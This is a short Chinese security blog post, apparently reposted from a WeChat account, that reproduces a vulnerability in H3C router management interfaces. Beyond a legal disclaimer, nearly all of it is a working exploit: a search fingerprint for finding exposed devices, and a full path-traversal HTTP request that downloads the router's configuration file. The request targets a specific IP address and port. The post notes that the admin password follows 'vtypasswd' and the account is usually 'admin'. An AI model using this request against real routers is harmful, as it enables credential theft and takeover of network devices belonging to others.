该文章来自作者日常学习笔记，也有部分文章是经过作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者无关。

漏洞复现

app.name="H3C Router Management"

根据根据系统名修改payload

发送请求包，获取管理员账号密码。

GET /userLogin.asp/../actionpolicy_status/../ER2200G2.cfg HTTP/1.1
Host: 110.167.126.234:8848
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

 

 密码就在vtypasswd之后，账户一般都是admin。